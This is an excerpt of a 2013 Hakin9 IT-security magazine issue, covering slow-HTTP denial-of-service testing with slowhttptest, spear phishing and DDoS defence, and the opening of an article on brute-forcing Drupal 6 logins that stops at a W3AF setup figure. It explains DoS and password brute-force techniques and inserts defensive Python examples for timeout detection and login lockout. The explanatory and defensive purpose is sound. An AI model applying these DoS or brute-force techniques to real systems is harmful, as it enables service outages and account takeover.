How to Brute-Force Drupal6 login pages? (DDoS, Backtrack 5 r3, Cyber Security, Metasploit)




PRACTICAL PROTECTION IT SECURITY MAGAZINE

Team

Editor in Chief: Dagmara Gładyś (dagmara.gladys@hakin9.org)
Editors: John Webb, Marco Hermans, Gareth Watters
Proofreaders: Jeff Smith, Oleksandr Bevz, Krzysztof Samborski
Special thanks to the beta testers and proofreaders who helped us with this issue. Without their assistance there would not be a Hakin9 magazine.
Senior Consultant/Publisher: Paweł Marciniak
CEO: Ewa Dudzic (ewa.dudzic@hakin9.org)
Production Director: Andrzej Kuca (andrzej.kuca@hakin9.org)
DTP: Ireneusz Pogroszewski
Art Director: Ireneusz Pogroszewski (ireneusz.pogroszewski@software.com.pl)
Marketing Director: Oleksandr Bevz (dagmara.gladys@hakin9.org)
Publisher: Software Press Sp. z o.o. SK, 02-682 Warszawa, ul. Bokserska 1
Phone: 1 917 338 3631
www.hakin9.org/en

Whilst every effort has been made to ensure the highest quality of the magazine, the editors make no warranty, expressed or implied, concerning the results of the content’s usage. All trademarks presented in the magazine were used for informative purposes only. All rights to trademarks presented in the magazine are reserved by the companies which own them.

DISCLAIMER!

The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

Dear Hakin9 Readers,

This month’s issue supplies you with the articles that are yet to be published in the forthcoming magazines. We would like to draw your attention to the best quality content of these publications and grant you a couple of articles representing all the topics covered in February. Hakin9 Extra with its Backtrack 5 r3 Guide can surely be regarded as this month’s hit. You can seize the opportunity of reading two articles about Backtrack by Alex Kah (Backtrack Linux – How to Ditch the Menu and Ball from the Command Line?) and Kevin Simons (How to Brute-force Drupal6 Login Pages?). The complete issue on Backtrack will be published this week. Next week’s publication will be devoted to yet another facet of Cyber Security in the articles of William F. Slater, III. You surely noted that this year’s Hakin9 OnDemand is being published as a series of issues focused on Cyber Security. This month, you can read about The Rise and Fall of Megaupload.com and Kim Dotcom. You can also learn a lot about our leading Cyber Security expert, William F. Slater, from the interview with him. The last week of February is booked for Exploiting Software and this month’s topic How to Penetrate with Metasploit? We decided to address the topic as we noted your interest in the Metasploit In A Nutshell issue (http://hakin9.org/metasploit-withnessus-and-backtrack-in-exploiting-software-0912/), published last October. We would like to remind you about the best articles from that publication. These are How to use Sqlploit? by George Karpouzas and How to Explore the IPv6 Attack Surface with Metasploit? by Mike Sheward. This month, we would like to focus on specific methods of penetration using Metasploit. We hope we managed to meet your expectations as far as the content of February’s issues is concerned. Please feel free to share your views about that; you are free to send us a message to en@hakin9.org.

Dagmara Gładyś
Hakin9 Editor and Hakin9 team

02/2013


CONTENTS

Hakin9

Stimulating Application Layer Denial of Service Attacks with SlowHTTPTest (page 06)
By Sergey Shekyan
Slow HTTP attacks are denial-of-service (DoS) attacks that rely on the fact that the HTTP protocol, by design, requires a request to be completely received by the server before it is processed. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. When the server’s concurrent connection pool reaches its maximum, this creates a denial of service.

How to Combat Email-Based Threats to Business Continuity with Trusted Sender Recognition? (page 08)
By Elizabeth Botes
Though mature and capable, the spam filters and anti-virus solutions that organizations currently rely on to counter email-based threats are quite simply not enough as new threats emerge. These threats can – and do – result in the theft of intellectual property, large sums of money being stolen and other serious disruptions that can significantly impact both day-to-day and long-term business operations.

Hakin9 Extra

Backtrack Linux – How to Ditch the Menu and Ball from the Command Line? (page 12)
By Alex Kah
Backtrack Linux has become more popular over the years as businesses have been losing money because of data breaches through malware infections or targeted attacks. The media has caught on and realized that these breaches are not only fascinating to the businesses themselves or the so-called nerds or geeks that resolve their issues; the general public is interested in these data breaches too, which makes Information Security huge news in 2013. The end result is a snowball effect that appears to only be picking up steam.

How to Brute-force Drupal6 Login Pages? (page 20)
By Kevin Simons
Authentication is a protocol or process that allows an entity or system to validate your identity. Back in the early days of computers, operating systems were using a password model to verify the user. The password model consists of a user name and a password. Nowadays, we see a variety of authentication protocols/processes. We have biometrics, a system that validates your identity based on, for example, your face or your fingerprint, both of which can be fooled. However, scientists are working on a system that scans your veins, and that looks promising.

Hakin9 OnDemand

The Rise and Fall of Megaupload.com and Kim Dotcom (page 28)
By William F. Slater, III
In January 2012 the U.S. Government took down the Megaupload.com website and then quickly filed charges against the owner, Kim Dotcom, and his colleagues for alleged “copyright infringement, conspiracy to commit money laundering, racketeering, rewarding users who uploaded pirated content for sharing, and turning a blind eye to requests from copyright holders to remove copyright-protected files.”

An Interview with William F. Slater, III (page 32)
By Ewa Duranc
Currently, I am a freelance Sr. IT Consultant and IT Project Manager. At this moment, I am actively engaged in working on and managing an exciting Fast-Track ISO 27001 Implementation Project. You can see other information about my career and things like certifications at this link: http://billslater.com/interview.

Hakin9 Exploiting Software

How to Use Sqlploit? (page 36)
By George Karpouzas
Databases nowadays are everywhere, from the smallest desktop applications to the largest web sites such as Facebook. Critical business information is stored in database servers that are often poorly secured. Someone with access to this information could have control over a company’s or an organization’s infrastructure. He could even sell this information to the company’s competitors.

How to Explore the IPv6 Attack Surface with Metasploit? (page 44)
By Mike Sheward
IPv6 is often described as a parallel universe, co-existing alongside existing IPv4 infrastructure in a bid to ease the transition process. Often left unmanaged and unmonitored in networks, those IPv6 packets could provide a great opportunity for the savvy attacker. Thanks to the Metasploit framework, exploring the IPv6 attack surface has become a lot easier.


Stimulating Application Layer Denial of Service Attacks with SlowHTTPTest

Slow HTTP attacks are denial-of-service (DoS) attacks that rely on the fact that the HTTP protocol, by design, requires a request to be completely received by the server before it is processed. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. When the server’s concurrent connection pool reaches its maximum, this creates a denial of service. These attacks are problematic because they are easy to execute (they need only minimal resources on the attacking machine) and hard to detect, because they generate very low-rate traffic that looks close to legitimate.

Another interesting attack in the same family is the slow read DoS attack. The idea is simple: bypass policies that filter slow clients by sending a legitimate, complete HTTP request, then read the response slowly, aiming to keep as many connections active as possible. It differs from the attacks above in its vector: instead of fooling the server at the application layer, it manipulates the TCP receive window size, making the transport layer on the server side slow down the outgoing data.

One of the most popular DoS tools according to Imperva’s research is slowhttptest, a tool that implements all of the attacks mentioned. Slowhttptest opens and maintains customizable slow connections to a target server, giving you a picture of the server’s limitations and weaknesses. Its output ranges from heartbeat messages on stdout, to complete test statistics in CSV format, to HTML-formatted charts. Web proxy support can be used either to direct the entire test traffic through an arbitrary proxy server, or only the traffic of the probe connection, which collects statistics about server availability independently from the main attack source.

The tool is distributed as a portable package, so just download the latest tarball from the project page, extract, configure, compile, and install:

$ tar -xzvf slowhttptest-x.x.tar.gz
$ cd slowhttptest-x.x
$ ./configure --prefix=PREFIX
$ make
$ sudo make install

It compiles and works on any Linux platform, as well as OS X and even Cygwin, if you are really desperate to run it on a Windows box. The only prerequisite is openssl-dev, so make sure you get it from your favorite package manager before building the tool. You can find all kinds of examples either in the project’s wiki or in the manual page, which is installed with the package and can be accessed the usual way:

$ man slowhttptest

Due to simple unawareness, many people are fooled by the configuration files distributed with web servers. Slow attacks should be handled and minimized, and vendors creating distribution packages for web servers should focus more on such controls. But for now, make sure you test your setup before trusting it completely.
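What a slow-connection test looks like from the defending side, as an added example that is not from the article or the slowhttptest project: a detector over constructed access-log lines that flags sources repeatedly hitting the server's request timeout (the window and threshold are assumptions to tune per server).

```python
"""Flag clients that keep opening slow, never-completed HTTP requests.

Added example; not code from the article or from the slowhttptest project.
A request the server gives up on (Apache's Timeout / mod_reqtimeout, nginx's
client_header_timeout and client_body_timeout) is logged with status 408 and
an empty request line. One 408 is a flaky client; a steady stream of them
from one address is what a slow-header or slow-body test looks like in the
access log. The log lines below are constructed, and WINDOW and THRESHOLD
are assumptions to tune for the server being protected.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Combined log format: host ident user [time] "request" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

WINDOW = timedelta(seconds=60)  # assumption: look-back window per client
THRESHOLD = 5                   # assumption: 408s inside WINDOW before flagging

# Constructed sample: 203.0.113.7 holds connections open until the server
# times them out; 198.51.100.2 is an ordinary visitor with one stray timeout.
SAMPLE_LOG = """\
198.51.100.2 - - [10/Feb/2013:14:00:00 +0000] "GET /index.php HTTP/1.1" 200 5120
203.0.113.7 - - [10/Feb/2013:14:00:05 +0000] "-" 408 -
203.0.113.7 - - [10/Feb/2013:14:00:12 +0000] "-" 408 -
198.51.100.2 - - [10/Feb/2013:14:00:15 +0000] "-" 408 -
203.0.113.7 - - [10/Feb/2013:14:00:19 +0000] "-" 408 -
203.0.113.7 - - [10/Feb/2013:14:00:26 +0000] "-" 408 -
this line is not in combined log format and is skipped
203.0.113.7 - - [10/Feb/2013:14:00:33 +0000] "-" 408 -
198.51.100.2 - - [10/Feb/2013:14:00:40 +0000] "GET /user/login HTTP/1.1" 200 2048
203.0.113.7 - - [10/Feb/2013:14:00:41 +0000] "-" 408 -
""".splitlines()


def parse_line(line):
    """Return the fields we need from one combined-format line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "req": m["req"],
        "status": int(m["status"]),
    }


def find_slow_clients(lines, window=WINDOW, threshold=THRESHOLD):
    """Map each offending client IP to the timestamp at which it crossed
    `threshold` request timeouts within `window`. Lines are expected in the
    order the server wrote them (access logs are chronological)."""
    recent = defaultdict(deque)  # ip -> timestamps of 408s still inside window
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["status"] != 408:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while rec["ts"] - q[0] > window:
            q.popleft()
        if len(q) >= threshold and rec["ip"] not in flagged:
            flagged[rec["ip"]] = rec["ts"]
    return flagged


def timeout_share(lines):
    """Per-client fraction of logged requests that ended in a 408, a second
    signal that separates a slow-connection source from a busy real user."""
    total, timeouts = defaultdict(int), defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        total[rec["ip"]] += 1
        if rec["status"] == 408:
            timeouts[rec["ip"]] += 1
    return {ip: timeouts[ip] / total[ip] for ip in total}


if __name__ == "__main__":
    for ip, when in find_slow_clients(SAMPLE_LOG).items():
        print(f"{ip}: {THRESHOLD} request timeouts within {WINDOW} by {when:%H:%M:%S}")
    for ip, share in timeout_share(SAMPLE_LOG).items():
        print(f"{ip}: {share:.0%} of requests timed out")
```

Slow-read connections complete their request and therefore never produce a 408; for those, log the response time (Apache's %D) and look for unusually long-lived responses instead.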

Sergey Shekyan

Sergey Shekyan is a Senior Software Engineer for Qualys, where he is focused on development of the company's on demand web application scanning service. With more than 10 years of experience in software design, development, testing and documentation, Sergey has contributed key product enhancements and software modules to various companies. Prior to Qualys, he designed and implemented a web-based system for general aviation pilots. As a senior software engineer for Navis, he contributed to projects involving development of container terminal operating systems (TOS) simulation software. He also designed and developed data analysis software modules for Virage Logic, a provider of semiconductor IP for the design of complex integrated circuits. Prior to working at Virage Logic, he developed manufacturing test program generation software for Credence Systems Corporation. Sergey holds both Masters and BS Degrees in Computer Engineering from the State Engineering University of Armenia. Twitter: @sshekyan


Combat Email-Based Threats to Business Continuity With Trusted Sender Recognition

Though mature and capable, the spam filters and anti-virus solutions that organizations currently rely on to counter email-based threats are quite simply not enough as new threats emerge. These threats can – and do – result in the theft of intellectual property, large sums of money being stolen and other serious disruptions that can significantly impact both day-to-day and long-term business operations.

What you will learn…
• The profile of spear phishing attacks
• How the attacks impact business

What you should know…
• Basic computer knowledge

Despite the best efforts of IT organizations, spam filters and anti-virus solutions are ill-suited to combatting carefully-crafted spear phishing messages, potentially crippling distributed denial of service (DDoS) attacks and the latest threat: “Social DDoS” attacks, which target specific individuals. Additionally, spam filters and anti-virus solutions can cause their own issues that must be addressed. Most notably, overzealous spam filters far too often quarantine legitimate – often business-critical and time-sensitive – emails, a phenomenon commonly known as email “false positives.”

Identity, Reputation and Authentication

Recognizing these limitations of spam filters and anti-virus solutions, industry visionaries are pioneering Messaging Intelligence platforms, next-generation solutions for ensuring the security, integrity and reliability of the messaging systems that organizations rely upon. At the heart of Messaging Intelligence platforms is the ability to make real-time decisions about email communications by triangulating a sender’s identity and reputation with email authentication.

Solving the Email False Positive Dilemma

The impact of false positives can be substantial now that email is the most important and fundamental method of communication in today’s enterprise, enabling individuals and groups to work efficiently to execute critical business processes throughout an organization. The loss – or even just the delay – of critical emails results in missed sales opportunities, irritated customers and other situations that can disrupt business operations and impact a company’s reputation. The respected analyst firm Osterman Research estimates that false positives cost organizations as much as US$230 per employee annually. Most analyst firms agree that the acceptable number of false positives is 3.5 messages per million (the six sigma multiplier) or less. But after analyzing hundreds of millions of emails at enterprises across North America, TrustSphere finds the average number of false positives to be in excess of 5,000 messages per million – with some organizations well beyond that.

Preventing Spear Phishing Attacks

Spear phishing is a more targeted form of phishing, in which specific individuals in an organization are targeted in order to steal valuable data. Recent high-profile breaches in several public companies and government agencies have caused growing concerns about the use of fraudulent email as part of targeted attacks. RSA, one of the world’s preeminent security and encryption companies, was itself hacked in March 2011, rendering many of its popular SecurID tags less secure. Attackers simply sent e-mails with the subject line “2011 Recruitment Plan” to selected RSA employees. One of the targeted employees opened the Excel file attached to the e-mail, setting loose a program that let the attacker control the employee’s PC. In general, spear phishing attacks aim to achieve high value outcomes such as the disclosure of commercially sensitive information, manipulation of stock prices, corporate or national espionage, or gaining access to secured systems. For example, by the time Quad/Graphics approached Condé Nast for payment in December 2010, the media giant (publishers of Vogue, Golf Digest, GQ, Vanity Fair, The New Yorker, Wired, etc.) had already paid nearly US$8 million into the account of a spear phisher posing as Quad/Graphics. Condé Nast’s accounts payable department had received a single email claiming to be from Quad/Graphics, a company that prints Condé Nast’s magazines, instructing them to send payments to a bank account specified in the email, accompanied by an electronic payment authorisation form. Once the form was authorised, Condé Nast effectively gave permission for their bank, JP Morgan Chase, to deposit funds in the account – which turned out to be fake. While most media focus on headline-grabbing spear phishing incidents like Condé Nast and assume such incidents to be few and far between, the reality is they occur all the time. One industry analyst estimates the cost of each successful spear phishing attack at US$160,000.

As the email messages required for conventional phishing attacks are sent unsolicited and in bulk, conventional spam detection techniques can be used to identify them relatively successfully. Spear phishing attacks, however, are more carefully crafted: the attacker studies an individual victim – usually an executive in a large organization – and builds an email message specific to that victim using social engineering techniques. The spear phishing email typically appears to be from someone known to the victim and on a topic that the person and the victim are likely to communicate about. Because of this, traditional spam filters afford virtually no protection against spear phishing attacks. Fortunately, these sophisticated and hyper-personalized attacks can be effectively countered by the identity and reputation analysis matched with email authentication of Messaging Intelligence platforms. By accurately assessing the sender’s reputation, recipients can be alerted to cautiously examine any suspect messages that cannot be verified as coming from the purported sender.

Social DDoS: When 99% Target One Person

Social DDoS attacks first came to light during the Occupy Wall Street movement. In a social DDoS attack, hundreds or thousands of individuals email a target executive – either simultaneously or over a short time period – to in essence “occupy” the target’s inbox. This attack effectively renders the target’s email account useless as these messages are delivered en masse. The actual impact of Social DDoS attacks is hard to gauge. While some executive targets claim to suffer only a minor inconvenience, the disruption to an organization’s day-to-day operations can be extensive, particularly if multiple executives are attacked at the same time. Again, spam filters and anti-virus solutions are useless to defend against this new type of attack. Because the messages come from individual senders and contain no language that can alert a spam filter, the messages are delivered en masse.

Mitigating DDoS Attacks

Financial institutions, enterprises, governments, service providers and educational institutions have all been targets of DDoS attacks, one of the more popular methods for criminals and activists to disrupt an organization’s ability to function. Initially, cyber criminals were the primary launchers of DDoS attacks, extorting companies with the threat of massive attack, but since the hacker group Anonymous launched its “Operation Payback” campaign to avenge the punishment of Wikileaks, DDoS attacks have become largely socially motivated. In addition to web and application services being brought to their knees, email – the lifeblood of an organization – is also often crippled. Traditionally, IT departments’ first response steps include locking down access through the firewall. This results in organizations’ communications being brought to a virtual standstill, while security specialists work to mitigate the attack. During the time it takes to fully remedy the attack, critical messages are delayed or lost, crippling productivity and harming reputations. A valuable component in mitigating a DDoS attack is to enable and keep trusted communication flowing. Identity and reputation email authentication management enables just this by identifying legitimate messages and prioritizing them for immediate delivery so that operations can continue normally. This dramatically reduces the impact of DDoS attacks on business operations.

Elizabeth Botes

Elizabeth Botes, Vice President, Marketing. Elizabeth Botes is a high-tech industry veteran with more than 15 years of managerial and channel marketing experience. Prior to joining TrustSphere, Elizabeth held a variety of senior management positions, including most recently serving as president of Brisbane Digital Consulting Group. Her experience also includes developing the global distribution channels for Terayon (Motorola), a $300 million manufacturer of broadband video, voice and data solutions, and senior management positions at Aethra (Radvision) and Polycom. Her tenure at Polycom began shortly after its founding and she was responsible for building its channel and international sales strategies, helping to grow the company to more than $500 million in revenues.



Hakin9 Extra

How to Brute-force Drupal6 Login Pages?

Authentication is a protocol or process that allows an entity or system to validate your identity. Back in the early days of computers, operating systems were using a password model to verify the user. The password model consists of a user name and a password. Nowadays, we see a variety of authentication protocols/processes.

We have biometrics, a system that validates your identity based on, for example, your face or your fingerprint, both of which can be fooled. However, scientists are working on a system that scans your veins, and that looks promising. We also have two-factor authentication, which basically comes down to identification based on what you know (a PIN) and what you have (a bank card). But with online banking systems it might go even further and you end up with multi-factor authentication. In order to purchase merchandise online you now need to provide a card number and a verification code. Then you are routed to a third-party system, like for example Ogone, to validate your payment. That system will contact your bank, usually through a web service, to show you the required procedure to validate the payment. Usually, it comes down to either using a digipass system or a bank card system that provides you with a one-time PIN, usually of 8 characters. If I look back at how I did payments online a year ago, I only needed to provide my card number and the verification code. I'm glad that the authentication process was adapted, because you can easily generate a Visa/MasterCard number and then you could probably guess the verification code by brute-forcing it. Today we will be looking at the password model, which is the simplest authentication model to implement.

The password model implementation

The password model has existed for ages and is heavily used. Think of CMS systems, OS logins, router logins, SSH, FTP, and even most web applications. And even though it is simple to implement, a lot of developers forget to implement the login lockout procedure. Hours before I started writing this article, Symantec published a white paper stating that 59% of all public websites are vulnerable to brute-forcing.

A password model is basically composed of a password (or a pass code, for example a PIN code) and a user name or ID. However, a lot of systems don't allow you to choose the administrator user name, which leaves you with just a password and a user name that is either admin or administrator. Other systems give you the freedom of also choosing the administrator user name. A fairly secure password model would be one that also provides a lockout mechanism after a certain number of retries. It's best to keep this number as low as possible. If users lock themselves out they are forced to call the administrator/administration department to unlock their user account/badge, or, in the case of a cell phone, they can also use the PUK code. Some systems let you retry a couple of times after some time has passed (e.g. a 6-hour wait).

To verify the password, the system the user logs in to must also store the password. Even though you would expect the saved password to be encrypted, some systems still store it in clear text. Other systems hash the password and others use a symmetric encryption algorithm. I won't go into detail about the security of those implementations.

Insecurity of a password model

Suppose that you have a system that doesn't have a lockout mechanism implemented: how are you sure that you are secure? I often hear a lot of administrators tell their users that they are safe if they use a password of minimum 8 characters, with a mix of upper and lower case letters, a special character like for example the @, and a number. And usually that user then forms a password that is quite predictable. He will use an upper case letter as the first character, then some lower case letters, and he will probably replace the a by the @. Eventually he will finish his password with a number. So a possible password would be “H@ttrick1”. But it gets even worse: crackers also know that if they have found this password, and after some time the user changes his login password, he usually will just add 1 to the number. So after a month or two, the password will become “H@ttrick2”. In short, users are lazy and not interested in security. They are even so lazy that they will write their user ID and password on a post-it, which leads to another possible threat, namely the insider attack.

And if you think that things couldn't get worse, just think back to a very old system called the mainframe. Usually the authentication happens over FTP (so plain text), the character set is restricted (so you can forget about using a lot of special characters) and depending on how you are communicating you might end up with all upper case characters. And if you thought this wasn't enough, you are restricted to 8 characters. However, you don't hear a lot about security breaches on mainframes or the password authentication model. There are two reasons for this. The first is that before you reach the mainframe you have to do a lot to invade the perimeter zones. And secondly, you are usually logged by IPS/IDS/SIEM/WAF software systems. But I did say usually. A lot of SMBs didn't install IPS/IDS or even SIEM software systems. The result is a system that did log the brute-forcing, but an administrator that wasn't aware of the brute-forcing. And if we look at web (application) logins, it gets even worse.

But even the large three-letter companies might have suffered from brute-force attacks. Usually, they do have the software to log it, but it just went unnoticed. A decent system not only logs, but also warns the system administrator. There are several software packages that do this, including SIEM solutions and BFD (Brute Force Detection) software. But what do you do when you see it? Shut down the network? Keep it up? An important question to ask. Large companies? Yes, well, in this case a large four-letter company named Sony just got fined, hours before I started writing this article, by the UK for £250,000. On 12th October 2011 Sony suffered from a massive brute-forcing attack on the PlayStation Network and Sony Online Entertainment accounts. The result: 60,000 PlayStation Network accounts and 33,000 Sony Online Entertainment network accounts compromised. This happened just months after the April PlayStation hack exposing over 77 million accounts! And to quote Symantec: “Overall, the IT managers we surveyed seem bullishly confident about website security. 19% of respondents told us that their corporate websites are totally secure. A further 55% describe their sites as very secure. Not one of the IT managers we surveyed told us that their companies' sites were insecure.”
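The lockout mechanism from the password-model section and the warning to the administrator asked for above, as an added example (not the article's code and not Drupal's): repeated failures lock an account for a waiting period, and one source failing against many accounts raises an alert. The class and constant names are assumptions for this example.

```python
"""Login lockout plus brute-force alerting for a password model.

Added example; not code from the article or from Drupal. It implements the
two controls the article asks for: a per-account lockout after a few failed
attempts, released only after a waiting period, and a warning to the
administrator when one source fails against many accounts. The names
LoginGuard, MAX_FAILURES, LOCKOUT_SECONDS, ALERT_WINDOW and ALERT_THRESHOLD
are assumptions for this example.
"""
import hashlib
import hmac
import os
import time
from collections import defaultdict, deque

MAX_FAILURES = 3            # article: keep the retry count as low as possible
LOCKOUT_SECONDS = 6 * 3600  # article's example: try again after a 6-hour wait
ALERT_WINDOW = 60           # seconds of failures considered for the alert
ALERT_THRESHOLD = 20        # failures from one source inside the window


def hash_password(password, salt, iterations=100_000):
    """Salted PBKDF2-SHA256; the article notes some systems still store
    passwords in clear text, which no lockout can compensate for."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def make_user(password):
    """Random salt plus hash: the record stored for one account."""
    salt = os.urandom(16)
    return salt, hash_password(password, salt)


# Checked against for unknown user names so that response time does not
# reveal whether an account exists.
DUMMY_RECORD = make_user("placeholder-not-a-real-password")


class FakeClock:
    """Deterministic clock so lockout expiry can be exercised without waiting."""
    def __init__(self, start=1_700_000_000.0):
        self.now = start

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


class LoginGuard:
    def __init__(self, users, clock=time.time, alert=print):
        self.users = users                 # username -> (salt, hash)
        self.clock = clock
        self.alert = alert                 # called with one string per alert
        self.failures = defaultdict(int)   # username -> consecutive failures
        self.locked_until = {}             # username -> unix time
        self.recent = defaultdict(deque)   # source -> failure timestamps
        self.alerted = set()               # sources already reported

    def attempt(self, username, password, source):
        """Return "ok", "denied" or "locked" for one login attempt."""
        now = self.clock()
        until = self.locked_until.get(username)
        if until is not None:
            if now < until:
                return "locked"    # no password check, counters untouched
            del self.locked_until[username]
            self.failures[username] = 0
        record = self.users.get(username)
        salt, stored = record if record is not None else DUMMY_RECORD
        ok = hmac.compare_digest(hash_password(password, salt), stored)
        if ok and record is not None:
            self.failures[username] = 0
            return "ok"
        self.failures[username] += 1
        self._note_failure(source, now)
        if self.failures[username] >= MAX_FAILURES:
            self.locked_until[username] = now + LOCKOUT_SECONDS
            return "locked"
        return "denied"

    def _note_failure(self, source, now):
        """Sliding-window failure count per source; alert once per source."""
        q = self.recent[source]
        q.append(now)
        while now - q[0] > ALERT_WINDOW:
            q.popleft()
        if len(q) >= ALERT_THRESHOLD and source not in self.alerted:
            self.alerted.add(source)
            self.alert(f"brute-force suspected from {source}: "
                       f"{len(q)} failed logins within {ALERT_WINDOW}s")


def demo():
    """Exercise lockout, expiry and alerting; returns what was observed."""
    clock, alerts = FakeClock(), []
    guard = LoginGuard({"admin": make_user("H@ttrick1")}, clock, alerts.append)
    seen = [guard.attempt("admin", "H@ttrick2", "203.0.113.5") for _ in range(3)]
    seen.append(guard.attempt("admin", "H@ttrick1", "203.0.113.5"))  # correct, but locked
    clock.advance(LOCKOUT_SECONDS + 1)
    seen.append(guard.attempt("admin", "H@ttrick1", "203.0.113.5"))  # lock expired
    for i in range(ALERT_THRESHOLD):  # one source sprays many account names
        guard.attempt(f"user{i}", "Password1", "198.51.100.9")
    return seen, alerts
```

Locking the account rather than the source is what stops guessing from a botnet, while the per-source alert is what tells the administrator it is happening.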

Brute-force techniques

There are several brute-force techniques. First, you have the dictionary attack, where you have a file preloaded with passwords. You can also have a file containing famous names. Then you have the heuristic approach, where you first try to figure out how long the maximum user name/password is. On websites this is fairly easy because they usually add a text size attribute, which can then be used to narrow down the possibilities. You can also use credential recycling, where you re-use previous user name/password combinations that you found in the victim's environment. And the last approach is full-blown brute-forcing, running through the whole key space till the end.

On top of the techniques, you also have other parameters to speed up the process. You can use the GPU, for example. You can do a parallel attack, where you target the victim from multiple computers. You can use ranges: for example, computer 1 tries passwords of up to 5 characters, computer 2 starts from 6 to 8 characters, and computer 3 has yet another range. And you can even create ranges for user names and passwords. Crackers usually also have the help of botnets: a complete interconnected system of compromised computer systems (zombies) that interact with their own intelligence servers, command and control servers and malware update servers. And if that wasn't enough strength, since 16th November 2012 researchers, scientists, engineers, security analysts and cyber criminals are aware that quantum computers are able to carry out calculations billions of times faster than today's most powerful machines. Still, to this day RSA encryption is safe, because the largest number factorized via Peter Shor's algorithm (http://en.wikipedia.org/wiki/Shor%27s_algorithm) was 21. But you can keep in mind that sooner or later those computers will break RSA so fast that it can be considered unsafe. So people can start to think about better encryption techniques.

Time needed for a brute-force today

Security researcher Thomas Roth figured out an (illegal) inexpensive way to break password-protected wireless networks. He wrote software that ran on Amazon's cloud environment, resulting in 400.000 passwords tested every second. This means that every business network and home network with relatively simple passwords and no lockout mechanism can be easily compromised. 50 supercomputers with a capacity of 20 PetaFLOPS that want to break a 256-bit AES symmetric key would in theory require 3×10^51 years. But if there is a flaw in the pseudo random generator, the key space might just not use the full 256-bit key space. Netscape's SSL implementation and Ubuntu's OpenSSL implementation were both flawed because of this. Suppose you have a system that can produce 15 million tries per second. We just assume to have a complex password with numbers and special characters, as well as upper and lower case characters. How long will it take? 6 places: 11 hours, 7 places: 6 weeks, 8 places: 10 years, 9 places: 1000 years, 10 places: 1700 years. A dual core processor with GPU can produce up to 10 million tries per second; however, current workstations can already produce up to 100 million tries per second. Supercomputers and distributed computing environments can produce over 1 billion tries. RC5-72, for example, can produce over 800 billion tries per second. Do you think you're safe with a password of 8 places? Guess again. Cyber criminals using the strength of their botnets would crack even your 10 places password in just a few months, instead of 1700 years. And if you look at the compromised accounts earlier, it just figures that a lot of users just don't use a complex 10 places password. Instead of using pass codes, passwords, user IDs, and usernames, start to use pass phrases for both the user and the password.
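To make the figures above comparable, here is an added calculator (not part of the article) that puts the guessing rates the text mentions side by side with the effective rate an online attacker gets against a lockout policy such as the Drupal 7 default mentioned later in the article (five failures, then a six-hour lock). The 95-symbol character set (digits, upper and lower case, specials) is an assumption; the rates are the article's own figures.

```python
# Added example: worst-case time to exhaust a password space at various
# guessing rates. Character set size and the "lockout" rate are assumptions
# labelled below; the other rates are figures quoted in the article.

SECONDS_PER_YEAR = 365.25 * 24 * 3600


def keyspace(charset_size: int, length: int) -> int:
    """Number of distinct passwords of exactly `length` symbols."""
    return charset_size ** length


def seconds_to_exhaust(charset_size: int, length: int, guesses_per_second: float) -> float:
    """Worst-case seconds to try every candidate at a steady guessing rate."""
    return keyspace(charset_size, length) / guesses_per_second


def lockout_rate(attempts_per_window: int, window_seconds: float) -> float:
    """Effective guesses/second an online attacker gets against an account
    that is locked for `window_seconds` after `attempts_per_window` failures
    (assumption: the attacker cannot sidestep the lock)."""
    return attempts_per_window / window_seconds


def human(seconds: float) -> str:
    """Round a duration to the unit a human would use."""
    if seconds < 3600:
        return f"{seconds / 60:.1f} minutes"
    if seconds < 86400:
        return f"{seconds / 3600:.1f} hours"
    if seconds < SECONDS_PER_YEAR:
        return f"{seconds / 86400:.1f} days"
    return f"{seconds / SECONDS_PER_YEAR:,.0f} years"


# Slowest to fastest. The first entry is the online rate against a
# 5-tries-per-6-hours lockout; the rest are offline rates from the article.
RATES = {
    "online, lockout 5 per 6 h":        lockout_rate(5, 6 * 3600),
    "Roth on EC2 (400,000/s)":          4e5,
    "article workstation (15 M/s)":     1.5e7,
    "25-GPU cluster (348 billion/s)":   3.48e11,
}


def table(charset_size: int = 95, lengths=(6, 8, 10)):
    """Rows of (rate label, password length, worst-case seconds)."""
    rows = []
    for label, rate in RATES.items():
        for n in lengths:
            rows.append((label, n, seconds_to_exhaust(charset_size, n, rate)))
    return rows


if __name__ == "__main__":
    for label, n, secs in table():
        print(f"{label:32s} {n:2d} chars: {human(secs)}")
```

The table makes the article's point numerically: the same 8-character password that falls in hours to an offline GPU cluster is out of reach online once a lockout caps the attacker at a handful of guesses per hour, which is why the hardening section below matters more than password length alone.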

W3AF

W3AF is a Web Application Attack and Audit Framework. It helps you find and exploit web application vulnerabilities. It is developed under the GPLv2 license using the Python language. The project also has short and long term objectives. One of those objectives is to become the best open source web application scanner. The objective is promising, but once you enter the brute-force area you'll see that a lot of those web application scanners suffer from false positives and false negatives. So let's check how well it behaves on a Drupal version 6.28 installation.

W3AF Form Brute-force plugin

I'll explain in this section how to configure the form brute-force plugin via W3AF GUI and W3AF Console. Let's start with the GUI first.

Figure 1. Configuration screen for a web audit


02/2013


How to Brute-force Drupal6 Login Pages

